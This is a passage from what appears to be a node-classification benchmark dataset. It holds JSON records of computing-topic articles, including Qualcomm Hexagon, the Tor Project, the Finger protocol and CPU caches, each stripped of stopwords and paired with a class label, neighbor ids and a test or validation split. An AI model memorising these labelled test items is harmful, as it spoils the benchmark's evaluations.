    "text": "Qualcomm_Hexagon:qualcomm hexagon hexagon qdsp6 brand family 32-bit multi-threaded microarchitectures implementing instruction set digital signal processor dsp developed qualcomm according 2012 estimation qualcomm shipped 1.2 billion dsp cores inside system chip socs average 2.3 dsp core per soc 2011 year 1.5 billion cores planned 2012 making qdsp6 shipped architecture dsp ceva around 1 billion dsp cores shipped 2011 90 ip-licenseable dsp market hexagon architecture designed deliver performance low power variety applications features hardware assisted multithreading privilege levels long instruction word vliw single instruction multiple data simd instructions geared toward efficient signal processing cpu capable in-order dispatching 4 instructions packet 4 execution units every clock hardware multithreading implemented barrel temporal multithreading threads switched round-robin fashion cycle 600 mhz physical core presented three logical 200 mhz cores v5 hexagon v5 switched dynamic multithreading dmt thread switch l2 misses interrupt waiting special instructions hot chips 2013 qualcomm announced details hexagon 680 dsp qualcomm announced hexagon vector extensions hvx hvx designed allow significant compute workloads advanced imaging computer vision processed dsp instead cpu march 2015 qualcomm announced snapdragon neural processing engine sdk allow ai acceleration using cpu gpu hexagon dsp qualcomm snapdragon 855 contains 4th generation on-device ai engine includes hexagon 690 dsp hexagon tensor accelerator hta ai acceleration port linux hexagon runs hypervisor layer hexagon virtual machine merged 3.2 release kernel original hypervisor closed-source april 2013 minimal open-source hypervisor implementation qdsp6 v2 v3 hexagon minivm released qualcomm bsd-style license support hexagon added 3.1 release llvm tony linthicum hexagon/hvx v66 isa support added 8.0.0 release llvm also non-fsf maintained branch gcc binutils qualcomm hexagon dsps available qualcomm snapdragon soc since 2006 snapdragon s4 msm8960 newer three qdsp cores two modem subsystem one hexagon core multimedia subsystem modem cores programmed qualcomm multimedia core allowed programmed user also used femtocell processors qualcomm including fsm98xx fsm99xx fsm90xx march 2016 announced semiconductor company conexant audiosmart audio processing software integrated qualcomm hexagon six versions qdsp6 architecture released v1 2006 v2 2007–2008 v3 2009 v4 2010–2011 qdsp6 v5 2013 snapdragon 800 qdsp6 v6 2016 snapdragon 820 v4 20 dmips per milliwatt operating 500 mhz clock speed hexagon varies 400–2000 mhz qdsp6 256–350 mhz previous generation architecture qdsp5 hexagon qdsp6 pre-hexagon qdsp5 cores used modern qualcomm socs qdsp5 mostly low-end products modem qdsps often pre-hexagon shown table qdsp5 usage qdsp6 hexagon usage single instruction packet inner loop fft packet claimed qualcomm equal 29 classic risc operations includes vector add 4x 16-bit complex multiply operation hardware loop support instructions packet done cycle",
    "neighbors": [
      1377,
      3457,
      2339,
      3911,
      9863,
      9911,
      9932,
      398,
      6415,
      6001,
      5363,
      10612,
      823,
      9913,
      731,
      5276,
      4286
    ],
    "mask": "Test"
  },
  {
    "node_id": 10726,
    "label": 4,
    "text": "The_Tor_Project:tor project tor project inc. massachusetts-based 501 c 3 research-education nonprofit organization founded computer scientists roger dingledine nick mathewson five others tor project primarily responsible maintaining software tor anonymity network tor project founded computer scientists roger dingledine nick mathewson five others december 2006 electronic frontier foundation eff acted tor project fiscal sponsor early years early financial supporters tor project included u.s. international broadcasting bureau internews human rights watch university cambridge google netherlands-based stichting.net october 2014 tor project hired public relations firm thomson communications order improve public image particularly regarding terms dark net hidden services educate journalists technical aspects tor may 2015 tor project ended tor cloud service december 2015 tor project announced hired shari steele former executive director electronic frontier foundation new executive director roger dingledine acting interim executive director since may 2015 remained tor project director board member later month tor project announced open technology fund sponsoring bug bounty program coordinated hackerone program initially invite-only focus finding vulnerabilities specific tor project applications may 25 2016 core developer public face tor project jacob appelbaum stepped position announced june 2 two-line statement tor following days allegations sexual mistreatment made public several people june 4 shari steele executive director tor project published statement saying recent allegations sexual mistreatment regarding appelbaum consistent rumors us hearing time asserted ... recent allegations much serious concrete anything heard previously appelbaum denounced allegations part concerted strategy damage reputation july 13 2016 complete board tor project – meredith hoban dunn ian goldberg julius mittenzwei rabbi rob thomas wendy seltzer roger dingledine nick mathewson – replaced matt blaze cindy cohn gabriella coleman linus nordberg megan price bruce schneier july 2016 tor project announced results seven-week investigation led private investigator allegations jacob appelbaum determined accurate shari steele noted everything power treat mr. appelbaum fairly determined allegations appear true investigation concluded many people inside outside tor project reported incidents humiliated intimidated bullied frightened jacob appelbaum several experienced unwanted sexually aggressive behavior two unnamed individuals involved inappropriate behavior longer part project institutionally despite top-down management organization working volunteers employees organizations new anti-harassment policy approved new board well conflicts interest policy procedures submitting complaints internal complaint review process initially affair caused split wider still close-knit privacy community coming appelbaum defense others presenting even allegations affair continues controversial considerable dissent within tor community 80 tor project 2 million annual budget came united states government u.s. state department broadcasting board governors national science foundation major contributors aid democracy advocates authoritarian states swedish government organizations provided 20 including ngos thousands individual sponsors dingledine said united states department defense funds similar research grant procurement contract tor executive director andrew lewman said even though accepts funds u.s. federal government tor service collaborate nsa reveal identities users june 2016 tor project received award mozilla open source support program moss award significantly enhance tor network metrics infrastructure performance stability network monitored improvements made appropriate march 2011 tor project received free software foundation 2010 award projects social benefit citation read using free software tor enabled roughly 36 million people around world experience freedom access expression internet keeping control privacy anonymity network proved pivotal dissident movements iran recently egypt september 2012 tor project received 2012 eff pioneer award along jérémie zimmermann andrew huang november 2012 foreign policy magazine named dingledine mathewson syverson among top 100 global thinkers making web safe whistleblowers 2014 roger dingledine nick mathewson paul syverson received usenix test time award paper titled tor second-generation onion router published proceedings 13th usenix security symposium august 2004",
    "neighbors": [
      8640,
      9762,
      1315,
      1764,
      711,
      8331,
      9965,
      82,
      9240,
      5085,
      8671
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10727,
    "label": 5,
    "text": "Finger_protocol:finger protocol computer networking name/finger protocol finger user information protocol simple network protocols exchange human-oriented status user information name/finger protocol based request comments document december 1977 interface codice_1 codice_2 programs provide status reports particular computer system particular person network sites finger program written 1971 les earnest created program solve need users wanted information users network information logged-in useful check availability person meet probably earliest form presence information remote network users prior finger program way get information codice_3 program showed ids terminal line numbers server internal number communication line user terminal connected logged-in users earnest named program idea people would run fingers codice_3 list find looking term finger 1970s connotation snitch made finger good reminder/mnemonic semantic unix codice_2 command client protocol context finger daemon runs tcp port 79 client case remote hosts open connection port 79 ruip remote user information program started remote end connection process request local host sends ruip one line query based upon finger query specification waits ruip respond ruip receives processes query returns answer initiates close connection local host receives answer close signal proceeds close end connection finger user information protocol based finger user information protocol december 1991 typically server side protocol implemented program codice_6 finger daemon client side implemented codice_1 codice_2 programs supposed return friendly human-oriented status report either system moment particular person depth required format protocol consists mostly specifying single command line program would supply information whether user currently logged-on e-mail address full name etc well standard user information finger displays contents codice_9 codice_10 files user home directory often file maintained user contains either useful information user current activities similar micro-blogging alternatively manner humor supplying detailed information e-mail addresses full names considered acceptable convenient early days networking later considered questionable privacy security reasons finger information used hackers way initiate social engineering attack company computer security system using finger client get list company employee names email addresses phone numbers hacker call email someone company requesting information posing another employee finger daemon also several exploitable security holes crackers used break systems example 1988 morris worm exploited overflow vulnerability codice_6 among others spread finger protocol also incompatible network address translation nat private network address ranges e.g 192.168.0.0/16 used majority home office workstations connect internet routers firewalls nowadays reasons finger widely used early days internet late 1990s vast majority sites internet longer offered service implemented unix unix-like systems current versions windows finger.exe command software finger support",
    "neighbors": [
      10242,
      515,
      1028,
      9733,
      9735,
      2568,
      4620,
      8204,
      6674,
      8729,
      10269,
      10271,
      10786,
      35,
      2085,
      562,
      9780,
      3133,
      574,
      5181,
      8265,
      3659,
      4174,
      4687,
      10341,
      10344,
      5225,
      6761,
      9834,
      1647,
      9839,
      9843,
      3191,
      5759,
      8834,
      5251,
      649,
      9868,
      6797,
      4750,
      3218,
      9365,
      2198,
      11413,
      4248,
      6812,
      3742,
      4771,
      9380,
      9381,
      3751,
      3752,
      7847,
      10924,
      6319,
      9909,
      6330,
      7356,
      4797,
      7364,
      4298,
      1741,
      5843,
      1750,
      9946,
      8432,
      4850,
      7411,
      11509,
      6396,
      1796,
      3847,
      5397,
      3350,
      10005,
      5402,
      808,
      4398,
      10033,
      1336,
      2361,
      5437,
      7486,
      8517,
      2887,
      8522,
      6993,
      2904,
      4956,
      5469,
      5470,
      5471,
      5472,
      11112,
      5482,
      367,
      5492,
      3970,
      10631,
      3976,
      4490,
      11147,
      5531,
      4001,
      7088,
      2996,
      1978,
      10171,
      3006,
      960,
      1474,
      965,
      2509,
      9167,
      4562,
      6120,
      9709,
      2545,
      11249,
      8692,
      9204,
      6138,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 10728,
    "label": 3,
    "text": "PPC_512:ppc 512 amstrad ppc512 amstrad ppc640 first portable ibm pc compatible computers made amstrad released 1988 development desktop pc-1512 pc-1640 models portable computers contained elements necessary perform computing move keyboard monochrome lcd display built also space disposable batteries power pc suitable alternative power source i.e mains 12 volt vehicle power available pcs came either one two double density double side floppy disc drives ppc640 model also featured modem models supplied 'ppc organiser software ppc640 additionally supplied 'mirror ii communications software two computers similar specifications ppc512 nec v30 processor running 8 mhz 512 kib memory full-size 102-key keyboard numeric keypad built-in liquid crystal display backlit could emulate cga mda either one two 720k 3.5 floppy drives model either ppc512s ppc512d depending number drives ppc640 otherwise identical except 640 kib memory built-in 1200 baud modem unusually fast day case darker shade grey versions machine empty socket main circuit board intel 8087 coprocessor could installed permit hardware processing floating point arithmetic ppc included standard connectors rs-232 centronics cga/mda video allowing existing peripherals used signals used 8-bit isa bus also available pair expansion connectors available external card cage expansion cards four possible power sources could used physical layout components unlike laptop designs instead lid containing screen contained keyboard hinges therefore front main unit rather back lcd hinged separately folded recess top system unit one two floppy drives located right-hand side closed size ppc 45 cm wide × 10 cm high × 23 cm deep bank six dip switches used select whether video hardware emulated cga mda whether use internal external monitor official hard drive option docking station manufactured sold third-party manufacturers ms-dos 3.3 supplied ppcs along 'organizer memory-resident suite utilities including card file diary calculator telephone dialler addition ppc 640 supplied mirror ii communications package use built-in modem ms-dos boot disk also included utility could used switch internal display external monitor without rebooting late 1988 amstrad created desktop computer based ppc design intended home market lcd replaced rf modulator display cga video domestic television keyboard system unit combined integrated case similar original atari st amiga 500 second floppy drive bay replaced two isa slots though design case cards fitted would protrude top computer pc200 black case 'sinclair branding pc20 white branded 'amstrad pc20s also omitted rf modulator support circuitry addition ms-dos 3.3 organizer pc20/pc200 supplied gem four cga-compatible games graphical capabilities cga sound output pc speaker greatly inferior compared home computers time consequently pc20/pc200 commercial success although pc20/pc200 support today floppy disk drives built-in fdd connector uses compatible floppy disk controller zilog z765a work modification fdd connector though 720k disks",
    "neighbors": [
      1121,
      7849,
      9166,
      6129,
      3091
    ],
    "mask": "Test"
  },
  {
    "node_id": 10729,
    "label": 9,
    "text": "Ad_hoc_polymorphism:ad hoc polymorphism programming languages ad hoc polymorphism kind polymorphism polymorphic functions applied arguments different types polymorphic function denote number distinct potentially heterogeneous implementations depending type argument applied also known function overloading operator overloading term ad hoc context intended pejorative refers simply fact type polymorphism fundamental feature type system contrast parametric polymorphism polymorphic functions written without mention specific type thus apply single abstract implementation number types transparent way classification introduced christopher strachey 1967 ad hoc polymorphism dispatch mechanism control moving one named function dispatched various functions without specify exact function called overloading allows multiple functions taking different types defined name compiler interpreter automatically ensures right function called way functions appending lists integers lists strings lists real numbers could written called append —and right append function would called based type lists appended differs parametric polymorphism function would need written generically work kind list using overloading possible function perform two completely different things based type input passed possible parametric polymorphism another way look overloading routine uniquely identified name combination name number order types parameters type polymorphism common object-oriented programming languages many allow operators overloaded manner similar functions see operator overloading languages dynamically typed lack ad hoc polymorphism including type classes longer function names codice_1 codice_2 etc seen advantage descriptive disadvantage overly verbose depending one point view advantage sometimes gained overloading appearance specialization e.g. function name implemented multiple different ways optimized particular data types operates provide convenient interface code needs specialized multiple situations performance reasons downside type system guarantee consistency different implementations since overloading done compile time substitute late binding found subtyping polymorphism previous section notwithstanding ways ad hoc polymorphism work consider example smalltalk language smalltalk overloading done run time methods function implementation overloaded message overloaded function resolved executed happens run time program compiled therefore polymorphism given subtyping polymorphism languages also extended functionality ad hoc polymorphism run time closer look also reveal smalltalk provides slightly different variety ad hoc polymorphism since smalltalk late bound execution model since provides objects ability handle messages understood possible go ahead implement functionality using polymorphism without explicitly overloading particular message may generally recommended practice everyday programming quite useful implementing proxies also general terms common class method constructor overloading considered polymorphism uniform languages classes regular objects smalltalk instance classes regular objects turn means messages sent classes overloaded also possible create objects behave like classes without classes inheriting hierarchy classes effective techniques used take advantage smalltalk powerful reflection capabilities similar arrangements also possible languages self newspeak imagine operator codice_3 may used following ways handle six function calls four different pieces code needed—or three strings considered lists characters thus name codice_3 actually refers three four completely different functions example overloading",
    "neighbors": [
      1952,
      11361,
      5456,
      5585,
      7889,
      9714,
      9875,
      11574,
      8251,
      3263
    ],
    "mask": "None"
  },
  {
    "node_id": 10730,
    "label": 2,
    "text": "Universal_Time-Sharing_System:universal time-sharing system universal time-sharing system uts discontinued operating system xds sigma series computers succeeding batch processing monitor bpm /batch time-sharing monitor btm uts announced 1966 delays actually ship 1971 designed provide multi-programming services online interactive user programs addition batch-mode production jobs symbiont spooled i/o critical real-time processes system daemons called ghost jobs used run monitor code user space final release d00 shipped january 1973 succeeded cp-v operating system combined uts heavily batch-oriented xerox operating system xos cp-v pronounced sea-pea-five operating system compatible successor uts released august 1973 cp-v supported cpus uts plus xerox 560 cp-v offers single-stream multiprogrammed batch timesharing remote processing mode including intelligent remote batch realtime processing added release b00 april 1974 transaction processing release c00 november 1974 cp-v version c00 f00 telefile tcp-v version i00 still run sigma emulator developed 1997 cp-r control program real-time discontinued realtime operating system xerox 550 sigma 9 computer systems cp-r supports three types tasks foreground primary tasks foreground secondary tasks batch tasks 1975 xerox decided exit computer business purchased scientific data systems 1969 honeywell offered purchase xerox data systems initially provide field service support existing customer base cp-6 system including os program products developed beginning 1976 honeywell convert xerox cp-v users run honeywell equipment first beta site installed carleton university ottawa canada june 1979 three sites installed end 1979 support cp-6 transferred actc canada 1993 cp-6 systems continued run many years us canada sweden uk germany final system shutdown carleton university 2005 cp-6 accomplishments developers customers commemorated plaque community wall computer history museum mountain view california cp-v software release b00 1974 cp-v supporrted cp-6 team honeywell los angeles development center ladc 1977 thereafter xerox maintained library xerox user-written software exchange user group",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      5022,
      7325,
      8606,
      9887,
      9762,
      10016,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      8262,
      4423,
      8136,
      3916,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      7515,
      477,
      10333,
      10590,
      97,
      1253,
      9829,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 10731,
    "label": 2,
    "text": "OS/7:os/7 os/7 discontinued operating system sperry univac 90/60 90/70 computer systems system first announced november 1971 univac 9700 system originally scheduled delivery march 1973. ref name= univac 90/60 90/70 univac 90/60 90/70 /ref however delivery slipped nearly year impacted 9700 marketing effort first demonstrated univac new 90/60 system october 1973 official release planned january 1974 os/7 abruptly discontinued 1975 favor vs/9 univac name rca vmos operating system os/7 multi-tasking multi-programming system utilizes roll-in roll-out capability keep cpu optimally busy",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      11539,
      9366,
      11667,
      6296,
      25,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      8889,
      6075,
      7483,
      10809,
      6078,
      2811,
      576,
      2625,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10732,
    "label": 2,
    "text": "Linux_From_Scratch:linux scratch linux scratch lfs type linux installation name book written gerard beekmans currently mainly maintained bruce dubbs book gives readers instructions build linux system source book available freely linux scratch site linux scratch way install working linux system building components manually naturally longer process installing pre-compiled linux distribution according linux scratch site advantages method compact flexible secure system greater understanding internal workings linux-based operating systems keep lfs small focused book beyond linux scratch blfs created presents instructions develop basic linux system created lfs introduces guides reader additions system including networking x sound printer scanner support since release 5.0 blfs book version matches lfs book version book cross linux scratch clfs focuses cross compiling including compiling headless embedded systems run linux lack resources needed compile linux clfs supports broad range processors addresses advanced techniques included lfs book cross-build toolchains multilibrary support 32 64-bit libraries side-by-side alternative instruction set architectures itanium sparc mips alpha book hardened linux scratch hlfs focuses security enhancements hardened kernel patches mandatory access control policies stack-smashing protection address space layout randomization besides main purpose creating security-focused operating system hlfs secondary goal security teaching tool automated linux scratch alfs project designed automate process creating lfs system aimed users gone lfs blfs books several times wish reduce amount work involved secondary goal act test lfs blfs books directly extracting running instructions xml sources lfs blfs books clean partition working linux system compiler essential software libraries required build lfs instead installing existing linux system one also use live cd build lfs system project formerly maintained linux scratch live cd lfs live cd contains source packages full version live cd lfs book automated building tools except minimal live cd version xfce gui environment work official lfs live cd longer maintained used build lfs version7 later however two unofficial builds used build 32-bit 64-bit kernel userspace respectively lfs 7.x first toolchain must compiled consisting tools used compile lfs like gcc glibc binutils necessary utilities root directory must changed using chroot toolchain partition start building final system one first packages compile glibc toolchain linker must adjusted link newly built glibc packages make finished system linked well chroot phase bash hashing feature turned temporary toolchain bin directory moved end path way newly compiled programs come first path new system builds new components list packages included clfs version 1.1.0 unless otherwise noted list applicable supported architectures standard build unit sbu term used initial bootstrapping system represents amount time required build first package lfs given computer creation prompted long time required build lfs system desire many users know long source tarball take build ahead time linux scratch version 6.3 first package built user gnu binutils building users encouraged measure build process using shell constructs dub time system standard build unit number known estimate time required build later packages expressed relative known sbu several packages built compilation take much longer build binutils including gnu c library rated 4.1 sbus gnu compiler collection rated 8.4 sbus unit must interpreted approximation various factors influence actual time required build package lwn.net reviewed lfs 2004 tux machines wrote review linux scratch 6.1 2005 tux machines also second part review third part source-based linux distributions",
    "neighbors": [
      9735,
      6664,
      10780,
      3618,
      9762,
      5677,
      9780,
      10292,
      5176,
      10817,
      7234,
      3142,
      8262,
      10341,
      9320,
      9843,
      9851,
      7812,
      8326,
      6797,
      2195,
      2197,
      2199,
      10394,
      1694,
      11442,
      692,
      10433,
      10967,
      1761,
      6371,
      10470,
      4841,
      5356,
      237,
      5358,
      1776,
      5363,
      2804,
      9972,
      246,
      11001,
      7938,
      5380,
      4360,
      7435,
      2316,
      11023,
      1813,
      5397,
      10016,
      3885,
      4398,
      7983,
      823,
      8504,
      7483,
      8522,
      8037,
      11112,
      8554,
      7534,
      5492,
      1399,
      3960,
      8582,
      4493,
      5523,
      11155,
      1436,
      1952,
      5032,
      4011,
      9646,
      4528,
      11188,
      9660,
      5067,
      4561,
      8147,
      479,
      7136,
      6120,
      5106,
      4598,
      4089,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10733,
    "label": 7,
    "text": "VMScluster:vmscluster vmscluster computer cluster involving group computers running openvms operating system whereas tightly coupled multiprocessor systems run single copy operating system vmscluster loosely coupled machine runs copy openvms disk storage lock manager security domain cluster-wide machines join leave vmscluster without affecting rest cluster enhanced availability vmsclusters support use dual-ported disks connected two machines storage controllers simultaneously openvms ported alpha ia-64 machines facility originally named vaxclustering renamed vmsclustering digital equipment corporation first announced vaxclusters may 1983 stage clustering required specialised communications hardware well major changes low-level subsystems vms software hardware designed jointly center cluster star coupler every node computer data storage device cluster connected one two pairs ci cables ci stands computer interconnect pair cables transmission rate 70 megabits per second high speed era using two pairs gave aggregate transmission rate 140 megabits per second redundancy case one cable failed star couplers also redundant wiring better availability ci cable connected computer via ci port could send receive packets without cpu involvement send packet cpu create small data structure memory append send queue similarly ci port would append incoming message receive queue tests showed vax-11/780 could send receive 3000 messages per second even though nominally 1-mips machine closely related mass storage control protocol mscp allowed similarly high performance mass storage subsystem addition mscp packets easily transported ci allowing remote access storage devices vaxclustering first clustering system achieve commercial success major selling point vax systems 1986 dec added vaxclustering support microvax minicomputers running ethernet instead special-purpose hardware giving high-availability advantages ci hardware local area vaxclusters provided attractive expansion path buyers low-end minicomputers later versions openvms v5.0 later supported mixed interconnect vaxclusters using ci ethernet vaxclustering dssi digital systems storage interconnect fddi among transports eventually high-bandwidth wide area networking became available clustering extended allow satellite data links long-distance terrestrial links allowed creation disaster-tolerant clusters locating single vaxcluster several diverse geographical areas cluster could survive infrastructure failures natural disasters vaxclustering greatly aided introduction terminal servers using lat protocol allowing ordinary serial terminals access host nodes via ethernet became possible terminal rapidly easily connect host node made much simpler accomplish fail user terminals one node cluster another eventually vaxclusters reached point cluster whole essentially never went rolling upgrades even allowed system operators upgrade openvms system software shutting upgrading rebooting individual nodes cluster whole continued processing cluster uptimes frequently measured years current longest uptime least sixteen years mentioned openvms also runs alpha ia-64 systems term vaxcluster replaced vmscluster gigabit ethernet common 10 gigabit ethernet introduced standard networking cables cards quite sufficient support vmsclustering",
    "neighbors": [
      3142,
      7303,
      2986,
      10220,
      7983,
      11604,
      757,
      118,
      3927,
      7134,
      3450,
      2395,
      3326
    ],
    "mask": "None"
  },
  {
    "node_id": 10734,
    "label": 3,
    "text": "CPU_cache:cpu cache cpu cache hardware cache used central processing unit cpu computer reduce average cost time energy access data main memory cache smaller faster memory closer processor core stores copies data frequently used main memory locations cpus different independent caches including instruction data caches data cache usually organized hierarchy cache levels l1 l2 l3 l4 etc. modern fast cpus specialized exceptions multiple levels cpu caches first cpus used cache one level cache unlike later level 1 caches split l1d data l1i instructions almost current cpus caches split l1 cache also l2 caches larger processors l3 caches well l2 cache usually split acts common repository already split l1 cache every core multi-core processor dedicated l2 cache usually shared cores l3 cache higher-level caches shared cores split l4 cache currently uncommon generally dynamic random-access memory dram rather static random-access memory sram separate die chip also case historically l1 bigger chips allowed integration generally cache levels possible exception last level extra level cache tends bigger optimized differently types caches exist counted towards cache size important caches mentioned translation lookaside buffer tlb part memory management unit mmu cpus caches generally sized powers two 4 8 16 etc kib mib larger non-l1 sizes although ibm z13 96 kib l1 instruction cache trying read write location main memory processor checks whether data location already cache processor read write cache instead much slower main memory modern desktop server cpus least three independent caches instruction cache speed executable instruction fetch data cache speed data fetch store translation lookaside buffer tlb used speed virtual-to-physical address translation executable instructions data single tlb provided access instructions data separate instruction tlb itlb data tlb dtlb provided data cache usually organized hierarchy cache levels l1 l2 etc see also multi-level caches however tlb cache part memory management unit mmu directly related cpu caches data transferred memory cache blocks fixed size called cache lines cache blocks cache line copied memory cache cache entry created cache entry include copied data well requested memory location called tag processor needs read write location memory first checks corresponding entry cache cache checks contents requested memory location cache lines might contain address processor finds memory location cache cache hit occurred however processor find memory location cache cache miss occurred case cache hit processor immediately reads writes data cache line cache miss cache allocates new entry copies data main memory request fulfilled contents cache make room new entry cache miss cache may evict one existing entries heuristic uses choose entry evict called replacement policy fundamental problem replacement policy must predict existing cache entry least likely used future predicting future difficult perfect method choose among variety replacement policies available one popular replacement policy least-recently used lru replaces least recently accessed entry marking memory ranges non-cacheable improve performance avoiding caching memory regions rarely re-accessed avoids overhead loading something cache without reuse cache entries may also disabled locked depending context data written cache point must also written main memory timing write known write policy write-through cache every write cache causes write main memory alternatively write-back copy-back cache writes immediately mirrored main memory cache instead tracks locations written marking dirty data locations written back main memory data evicted cache reason read miss write-back cache may sometimes require two memory accesses service one first write dirty location main memory another read new location memory also write main memory location yet mapped write-back cache may evict already dirty location thereby freeing cache space new memory location intermediate policies well cache may write-through writes may held store data queue temporarily usually multiple stores processed together reduce bus turnarounds improve bus utilization cached data main memory may changed entities e.g peripherals using direct memory access dma another core multi-core processor case copy cache may become out-of-date stale alternatively cpu multiprocessor system updates data cache copies data caches associated cpus become stale communication protocols cache managers keep data consistent known cache coherence protocols cache performance measurement become important recent times speed gap memory performance processor performance increasing exponentially cache introduced reduce speed gap thus knowing well cache able bridge gap speed processor memory becomes important especially high-performance systems cache hit rate cache miss rate play important role determining performance improve cache performance reducing miss rate becomes one necessary steps among steps decreasing access time cache also gives boost performance time taken fetch one cache line memory read latency due cache miss matters cpu run things waiting cache line cpu reaches state called stall cpus become faster compared main memory stalls due cache misses displace potential computation modern cpus execute hundreds instructions time taken fetch single cache line main memory various techniques employed keep cpu busy time including out-of-order execution cpu pentium pro later intel designs example attempts execute independent instructions instruction waiting cache miss data another technology used many processors simultaneous multithreading smt orin intel terminologyhyper-threading ht allows alternate thread use cpu core first thread waits required cpu resources become available replacement policy decides cache copy particular entry main memory go replacement policy free choose entry cache hold copy cache called fully associative extreme entry main memory go one place cache cache direct mapped many caches implement compromise entry main memory go one n places cache described n-way set associative example level-1 data cache amd athlon two-way set associative means particular location main memory cached either two locations level-1 data cache choosing right value associativity involves trade-off ten places replacement policy could mapped memory location check location cache ten cache entries must searched checking places takes power chip area potentially time hand caches associativity suffer fewer misses see conflict misses cpu wastes less time reading slow main memory general guideline doubling associativity direct mapped two-way two-way four-way effect raising hit rate doubling cache size however increasing associativity four improve hit rate much generally done reasons see virtual aliasing cpus dynamically reduce associativity caches low-power states acts power-saving measure order worse simple better complex cache organization location main memory go one entry cache therefore direct-mapped cache also called one-way set associative cache replacement policy since choice cache entry contents evict means two locations map entry may continually knock although simpler direct-mapped cache needs much larger associative one give comparable performance unpredictable let block number cache block number memory number blocks cache mapping done help equation location main memory cached either two locations cache one logical question one two simplest commonly used scheme shown right-hand diagram use least significant bits memory location index index cache memory two entries index one benefit scheme tags stored cache include part main memory address implied cache memory index since cache tags fewer bits require fewer transistors take less space processor circuit board microprocessor chip read compared faster also lru especially simple since one bit needs stored pair one advantages direct mapped cache allows simple fast speculation address computed one cache index might copy location memory known cache entry read processor continue work data finishes checking tag actually matches requested address idea processor use cached data tag match completes applied associative caches well subset tag called hint used pick one possible cache entries mapping requested address entry selected hint used parallel checking full tag hint technique works best used context address translation explained schemes suggested skewed cache index way 0 direct index way 1 formed hash function good hash function property addresses conflict direct mapping tend conflict mapped hash function less likely program suffer unexpectedly large number conflict misses due pathological access pattern downside extra latency computing hash function additionally comes time load new line evict old line may difficult determine existing line least recently used new line conflicts data different indexes way lru tracking non-skewed caches usually done per-set basis nevertheless skewed-associative caches major advantages conventional set-associative ones true set-associative cache tests possible ways simultaneously using something like content addressable memory pseudo-associative cache tests possible way one time hash-rehash cache column-associative cache examples pseudo-associative cache common case finding hit first way tested pseudo-associative cache fast direct-mapped cache much lower conflict miss rate direct-mapped cache closer miss rate fully associative cache cache row entries usually following structure data block cache line contains actual data fetched main memory tag contains part address actual data fetched main memory flag bits discussed size cache amount main memory data hold size calculated number bytes stored data block times number blocks stored cache tag flag error correction code bits included size although affect physical area cache effective memory address goes along cache line memory block split msb lsb tag index block offset index describes cache set data put index length formula_1 bits cache sets block offset specifies desired data within stored data block within cache row typically effective address bytes block offset length formula_2 bits number bytes per data block tag contains significant bits address checked rows current set set retrieved index see set contains requested address cache hit occurs tag length bits follows authors refer block offset simply offset displacement original pentium 4 processor four-way set associative l1 data cache 8 kib size 64-byte cache blocks hence 8 kib 64 128 cache blocks number sets equal number cache blocks divided number ways associativity leads 128 4 32 sets hence 2 32 different indices 2 64 possible offsets since cpu address 32 bits wide implies 32 5 6 21 bits tag field original pentium 4 processor also eight-way set associative l2 integrated cache 256 kib size 128-byte cache blocks implies 32 8 7 17 bits tag field instruction cache requires one flag bit per cache row entry valid bit valid bit indicates whether cache block loaded valid data power-up hardware sets valid bits caches invalid systems also set valid bit invalid times multi-master bus snooping hardware cache one processor hears address broadcast processor realizes certain data blocks local cache stale marked invalid data cache typically requires two flag bits per cache line valid bit dirty bit dirty bit set indicates associated cache line changed since read main memory dirty meaning processor written data line new value propagated way main memory cache miss failed attempt read write piece data cache results main memory access much longer latency three kinds cache misses instruction read miss data read miss data write miss cache read misses instruction cache generally cause largest delay processor least thread execution wait stall instruction fetched main memory cache read misses data cache usually cause smaller delay instructions dependent cache read issued continue execution data returned main memory dependent instructions resume execution cache write misses data cache generally cause shortest delay write queued limitations execution subsequent instructions processor continue queue full detailed introduction types misses see cache performance measurement metric general purpose cpus implement form virtual memory summarize either program running machine sees simplified address space contains code data program programs run common virtual address space program executes calculating comparing reading writing addresses virtual address space rather addresses physical address space making programs simpler thus easier write virtual memory requires processor translate virtual addresses generated program physical addresses main memory portion processor translation known memory management unit mmu fast path mmu perform translations stored translation lookaside buffer tlb cache mappings operating system page table segment table purposes present discussion three important features address translation early virtual memory systems slow required access page table held main memory every programmed access main memory caches effectively cut speed memory access half first hardware cache used computer system actually data instruction cache rather tlb caches divided four types based whether index tag correspond physical virtual addresses speed recurrence load latency crucial cpu performance modern level-1 caches virtually indexed least allows mmu tlb lookup proceed parallel fetching data cache ram virtual indexing best choice cache levels cost dealing virtual aliases grows cache size result level-2 larger caches physically indexed caches historically used virtual physical addresses cache tags although virtual tagging uncommon tlb lookup finish cache ram lookup physical address available time tag compare need virtual tagging large caches tend physically tagged small low latency caches virtually tagged recent general-purpose cpus virtual tagging superseded vhints described cache relies virtual indexing tagging becomes inconsistent virtual address mapped different physical addresses homonym solved using physical address tagging storing address space identifier cache line however latter approach help synonym problem several cache lines end storing data physical address writing locations may update one location cache leaving others inconsistent data issue may solved using non-overlapping memory layouts different address spaces otherwise cache part must flushed mapping changes great advantage virtual tags associative caches allow tag match proceed virtual physical translation done however coherence probes evictions present physical address action hardware must means converting physical addresses cache index generally storing physical tags well virtual tags comparison physically tagged cache need keep virtual tags simpler virtual physical mapping deleted tlb cache entries virtual addresses 